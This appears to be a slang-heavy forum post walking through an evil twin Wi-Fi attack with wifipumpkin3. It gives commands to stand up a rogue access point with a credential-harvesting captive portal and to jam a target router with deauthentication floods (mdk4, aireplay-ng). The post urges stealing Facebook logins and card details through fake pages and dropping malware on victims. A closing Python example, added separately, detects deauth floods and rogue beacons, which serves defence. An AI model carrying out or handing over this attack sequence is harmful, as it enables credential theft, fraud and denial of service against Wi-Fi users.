Last EvilTwin WIFI Attack: wifipumpkin3


Post by ethical hacker » Sun Mar 10, 2024 6:36 am

Wifipumpkin3 is proper wicked, innit? You gotta have a play with this tool, but for now, let's get stuck into them EvilTwin Wi-Fi attacks. Sound good?
Make sure you got your Alfa network cards all plugged in and hooked up to your Kali VM before you kick off this tool, mate.

If you're gonna keep tryin' this out loads, make sure to bin the network on your device you used for testin' and fire up wifipumpkin3 again before havin' another go or you'll run into problems.
Plus, every gadget will have its own vibe with your dodgy AP, so give it a whirl on all your bits and bobs to suss out the ups and downs of this gizmo. Nothin's spot on, innit?

1.- Type in terminal:

Code:

sudo airmon-ng check kill
sudo wifipumpkin3
sudo wifipumpkin3 -i INTERFACE
ap

Example: sudo wifipumpkin3 -i wlan1
2.- Check it out - the standard SSID for the AP is "WiFi Pumpkin 3". We can switch that up to anythin' we fancy usin' the "set ssid" command. For this gig, let's call our AP "TESTWIFI".

Code:

set ssid TESTWIFI
proxies

3.- There's bare proxies we can use with this tool, but we're gonna make a captive portal for muppets to link up to our AP to try and nick some creds. We'll be using the "captiveflask" proxy to make a captive portal.

Code:

ignore pydns_server
set plugin sniffkin3 false
set proxy captiveflask
proxies

4.- We're on the 'captiveflask' proxy now, innit? Check it, there's bare Captive Portal plugins to pick from. For now, we'll keep it on the standard DarkLogin vibe so you can clock what's what. Cool, grab your blower or another laptop/puter and cut the Wi-Fi so you can peep the fresh AP you're gonna make.

Code:

start

5.- When you clock "Running on http://0.0.0.0:80/", your dodgy AP is up and running. Grab your blower or laptop, flick the Wi-Fi back on, and start hunting for "TESTWIFI". Once you spot the Wi-Fi, jump on it to see what's popping on that gizmo. When you hit the captive portal screen, slap in USERNAME for the handle and PASSWORD for the code, then hit "SIGN IN" while keeping an eye on the wifipumpkin3 console to peep the deets on the screen.
6.- Alright mate, let's park our attack for a bit.

Code:

stop

7.- Check this out - you can make your own Wi-Fi hotspot, pick what you want, set up a fancy portal that pops up when someone jumps on it, and grab all the info they type in. You can go wild with it - like setting up a "Free Wi-Fi" spot with a Facebook login page to nab those FB deets, or trick folks into giving up their cc info with a fake paywall site, or even send some dodgy stuff to your targets. Sky's the limit, innit?
8.- Alright, listen up. Make sure you're on the ball with that Router DoS, but give it a whirl first before you go all out on others, yeah?
Type in terminal:

Code:

sudo airmon-ng check kill
sudo airmon-ng start INTERFACE

9.- We gotta find the Wi-Fi network we're after and grab the BSSID:

Code:

sudo airodump-ng INTERFACE

10.- Once you've clocked the BSSID of your target, just hold down "CTRL" and tap "C" on your keyboard. Look, we've got the deets now to jam that router, we've got the BSSID. Easy peasy!
11.- Most home routers ain't gonna last long against this kind of hit, but with all the routers about, you'll suss it out. When you kick off the DoS attack, give it 3 - 5 minutes before you fire up your dodgy AP with wifipumpkin3 to make sure that Wi-Fi network's gone. Sooner or later, someone will clock their Wi-Fi's down, tempting them to jump on your fake AP. And when they do, bam, they'll be staring at your dodgy portal page. And yeah, you can make that page to nick their deets for X or drop some malware on 'em.
12.- We smash Wi-Fi routers using a mix of tricks, like De-Authing the whole network to knock the router out or stop anyone from jumping on.
In new terminal:

Code:

sudo mdk4 INTERFACE a -a E0:AC:BF:0C:0F:00
sudo aireplay-ng --deauth 0 -a E0:AC:BF:0C:0F:00 INTERFACE

(E0:AC:BF:0C:0F:00 IS THE BSSID OF THE WIFI, INTERFACE MAY BE wlan0/wlan1).
13.- Some folks'll clock that their router's MIA for a hookup, while others might spot it online but can't get in. It all hinges on the kind of router you're gunning for. Even if you spot your Wi-Fi up for grabs, you won't actually get in. Now, fire up your dodgy AP with wifipumpkin3 using your other Wi-Fi card, chill out for the peeps to jump on, and watch 'em walk straight into your wicked setup.
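
Seen from the monitoring side, the sequence in steps 8 to 13 leaves two signals: a burst of deauthentication frames against the real BSSID, then the same SSID beaconed from a BSSID that is not in the AP inventory. The Python below is an added example, not part of the original post; the event format, the KNOWN_APS inventory, the thresholds and the second BSSID are assumptions constructed for illustration.

```python
from collections import Counter

# Assumed inventory of sanctioned APs: SSID -> {BSSID: encryption expected?}
KNOWN_APS = {"TESTWIFI": {"E0:AC:BF:0C:0F:00": True}}
LEGIT, ROGUE = "E0:AC:BF:0C:0F:00", "02:00:00:AA:BB:CC"  # ROGUE is constructed

# Constructed sensor events (ts in seconds), not captured from a real network:
# a normal beacon, 20 deauths/s for 20 s, then an open look-alike beacon.
EVENTS = (
    [{"ts": 0, "kind": "beacon", "ssid": "TESTWIFI", "bssid": LEGIT, "encrypted": True}]
    + [{"ts": 60 + i // 20, "kind": "deauth", "bssid": LEGIT} for i in range(400)]
    + [{"ts": 300, "kind": "beacon", "ssid": "TESTWIFI", "bssid": ROGUE, "encrypted": False}]
)

def deauth_floods(events, per_second=10):
    """Map each BSSID to the first second in which its deauth count exceeds the limit."""
    counts = Counter((e["bssid"], int(e["ts"])) for e in events if e["kind"] == "deauth")
    floods = {}
    for (bssid, sec), n in sorted(counts.items(), key=lambda kv: kv[0][1]):
        if n > per_second:
            floods.setdefault(bssid, sec)
    return floods

def rogue_beacons(events, known=KNOWN_APS):
    """Beacons that reuse a sanctioned SSID from an unlisted BSSID or without encryption."""
    hits = []
    for e in events:
        if e["kind"] != "beacon" or e["ssid"] not in known:
            continue
        expected = known[e["ssid"]].get(e["bssid"])
        if expected is None:
            hits.append((e["ts"], e["ssid"], e["bssid"], "unknown BSSID"))
        elif expected and not e["encrypted"]:
            hits.append((e["ts"], e["ssid"], e["bssid"], "encryption downgrade"))
    return hits

def correlate(events, known=KNOWN_APS, window=600):
    """Rate a rogue beacon 'high' if a sanctioned AP of that SSID was flooded just before."""
    floods = deauth_floods(events)
    alerts = []
    for ts, ssid, bssid, _reason in rogue_beacons(events, known):
        preceded = any(0 <= ts - floods[b] <= window for b in known[ssid] if b in floods)
        alerts.append(("high" if preceded else "medium", ssid, bssid))
    return alerts

if __name__ == "__main__":
    for alert in correlate(EVENTS):
        print(alert)
```

An unlisted BSSID on its own rates "medium"; the same beacon arriving within the window after a deauth flood on the sanctioned AP rates "high".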
